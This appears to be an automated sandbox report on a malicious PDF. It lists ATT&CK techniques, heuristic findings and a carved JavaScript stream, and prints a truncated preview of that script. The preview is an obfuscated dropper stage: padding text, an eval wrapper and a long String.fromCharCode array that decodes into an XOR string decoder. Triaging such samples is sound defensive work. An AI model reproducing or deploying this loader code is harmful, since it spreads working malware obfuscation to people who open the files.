MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript, flagged by multiple heuristics as a potential exploit. The JavaScript stream, though heavily obfuscated, uses String.fromCharCode and eval, indicating it's designed to execute arbitrary code. This strongly suggests the PDF is a dropper or exploit document intended to download and execute a secondary malicious payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.jsd2bda71aaecd1a24047aae90bc6f2eacbda7a486ac100747d158f42c59d621fa |
pdf-javascript-stream | PDF /JS object 7 at offset 0x420 | 143363 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Yrtavy3 = 'Reagan icon time piles trade teddy props hump throws pecan gggg. This isalign aged nh mint. According as after behind over under.<br> Through answered the this isalign aged nh mint busy foam new gain. Nh mint busy foam new gain pecan gggg.<br> Gggg hem here whine ez rome reagan icon time. Out through answered the this. For on into to without upon up according. Hem here whine ez rome reagan icon time piles. Icon time piles trade teddy props hump throws mint busy foam.<br> Hump throws on into to without upon up according as after. Nh mint busy foam new gain pecan gggg hem here. Rome reagan icon time piles trade teddy props hump. Aged nh mint busy foam new gain pecan gggg hem here. Props hump throws ez rome reagan icon time piles trade teddy. Isalign aged nh mint busy. Gain pecan gggg hem here whine. By at from of out through answered the this. Pecan gggg hem here whine ez rome reagan icon. Aged nh mint busy foam new gain pecan gggg. Hump throws throws teddy props hump throws. Busy foam new gain pecan gggg. Up according as after behind over. Aged nh mint busy foam new gain. Into to without upon up according as after behind over. New gain pecan gggg hem here whine ez rome reagan icon time. Throws at from of out through. Teddy props hump throws pecan gggg hem here whine.<br> In for on into to without upon up according as after. Over under by at from.<br> Hump throws after behind over under by.<br> Pecan gggg hem here whine ez rome reagan. Busy foam new gain pecan. Through answered the this isalign aged nh mint busy foam. ';
function Tpsnif5(Apkh99){
if (app) {
eval(Apkh99);
}
}
if (app) Yrtavy3 = '';
Tpsnif5(eval(' String.fromCharCode(102 ,117 ,110 ,99 ,116/*Mxts9oplc85g82vt3ev */,105 ,111 ,110/*M0c66w0zt4slcze0lvj1 */,32/*Q7gj219ppagil */,68/*Aptfrzyypkjfw1pgw81kom */,119 ,122 ,107 ,116 ,109 ,99/*Wjqj7ggwmucraox04ktzdt5 */,55 ,40 ,84 ,107 ,116 ,114 ,122 ,108 ,53 ,41 ,123 ,118 ,97 ,114 ,32/*Wcgnl42dfprhu7a6y */,67/*T8ywm86gi76wh91sl */,103 ,113 ,57/*V3t5tm1ksk9z71 */,104/*Fifge0yykr7buk7 */,106 ,49 ,50 ,117 ,61 ,48/*V5d7j9pezrozrlx */,59 ,118 ,97 ,114 ,32 ,83 ,107 ,117/*If653ij2bi97fk9dnn */,56 ,118 ,105 ,61/*Fwf9l8otk25v7oy */,34 ,34 ,59 ,10/*Kc3rws2ukzp3y7 */,32 ,32 ,102 ,111 ,114 ,32/*A7mh32od14thbsxio4 */,40 ,67 ,103 ,113 ,57 ,104 ,106 ,49/*Yrwq6nf0dvpezsfx8w */,50 ,117 ,32 ,61 ,32 ,48 ,59/*Mzyjg6wdsjgkrushyds */,67 ,103 ,113 ,57 ,104 ,106 ,49 ,50 ,117 ,32 ,60 ,84 ,107 ,116/*Yxwsgdlr6osjwyu0t7jpnvm */,114 ,122 ,108/*Q3rsbncnvj2tlxua2i */,53 ,46 ,108 ,101 ,110 ,103 ,116/*Snk0sd6yo6adkv */,104 ,59 ,67 ,103 ,113/*Eid1xkah9pl4o8q0n */,57 ,104 ,106/*Qp9ph6zwq35d9wee2 */,49 ,50 ,117 ,43 ,43 ,41 ,123 ,10 ,32 ,32 ,32/*Pnzchlbbjlyfqpza534 */,83 ,107 ,117 ,56 ,118 ,105 ,32 ,61 ,32 ,83/*K80ppe6jq3dc5s1972pe */,107 ,117 ,56 ,118/*Cfoocxulvzvqd20rfj */,105 ,43 ,83 ,116 ,114 ,105 ,110 ,103 ,46 ,102 ,114 ,111 ,109/*Luhgbo9penzcjibmntr */,67 ,104 ,97 ,114 ,67 ,111 ,100 ,101 ,40 ,84 ,107 ,116 ,114 ,122/*Tu4njdo9o3hmz3s1hh */,108/*Kij6ylv5wfnzm94 */,53 ,46 ,99 ,104 ,97 ,114/*Kwmwuod6isid7i */,67 ,111 ,100 ,101 ,65 ,116 ,40 ,67/*Ox47s1b30fccvbak4 */,103 ,113 ,57 ,104 ,106 ,49/*Heb43kypf9zc9vfwcd0 */,50 ,117 ,41 ,94 ,49 ,41 ,59 ,10/*Jgytyj134keexkj */,32 ,32 ,125 ,10 ,32 ,32 ,114 ,101 ,116 ,117/*Wwy2zapqlt7i4ig36r */,114 ,110 ,32 ,83 ,107/*Iq4kcp8f58llpc89 */,117 ,56/*Gx3uwq3n1pq8pdm6 */,118 ,105/*H29yb6ji99ojh037 */,59 ,10 ,125 ,10 ,102 ,117 ,110/*Wbtjd14k0r1ei3c3b4 */,99 ,116 ,105 ,111 ,110 ,32 ,84 ,54/*G5b75pnk933a7fywfri */,52 ,50 ,50 ,98 ,116/*Ucrinwkikvl1piclz */,109/*Asujo1qhjfnaa71y */,98 ,40 ,80 ,51/*Hatldeisgvi0qtda */,48 ,50 ,55 ,55 ,121 ,57/*B9xnfnj2w6lakco0pug */,41 ,123 ,10 ,32 ,32 ,32 ,114/*Rybm9d1qd61fxp2c */,101 ,116 ,117 ,114/*Dae0t1yaeprqkei0uc8v */,110 ,32 ,117 ,110/*Ga4ivrez60hd5fv */,101 ,115 ,99 ,97 ,112 ,101 ,40 ,80 ,51 ,48 ,50/*M7164pxnpg3a1aam6jv */,55 ,55/*Luwtzekqeyu0t2xd323 */,121 ,57 ,41 ,59 ,10 ,125 ,10/*Flh5f5dgi83il4w */,10/*Ifeanw1mdesnpktf */,10 ,118 ,97 ,114 ,32 ,73 ,106
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.